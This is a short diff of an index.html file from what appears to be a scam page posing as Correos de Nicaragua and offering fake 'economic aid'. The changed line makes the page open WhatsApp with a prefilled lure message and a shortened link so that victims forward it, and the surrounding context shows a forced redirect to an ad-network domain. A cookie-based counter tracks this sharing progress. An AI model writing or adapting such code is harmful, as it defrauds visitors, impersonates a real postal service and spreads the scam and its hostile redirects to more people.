--- a/index.html
+++ b/index.html
@@ -1076,7 +1076,7 @@ t.state && location.replace("//graizoah.com/afu.php?zoneid=1446052")
 	        
 	       
 
-	        location.href = 'whatsapp://send?text= 🎉📮🎉️️️️️️️️️️️️Correos de Nicaragua Correos ¡Ayuda Económica!🇳🇮🏤️️🎊  %0A tinyurl.com/offer-camtel';
+	        location.href = 'whatsapp://send?text= 🎉📮🎉️️️️️️️️️️️️Correos de Nicaragua Correos ¡Ayuda Económica!🇳🇮🏤️️🎊  %0A tinyurl.com/correos-ni';
 
 	        setTimeout(function () {
 	            get_Cookie('prog') == '' ? value = 1 : value = parseInt(get_Cookie('prog'));
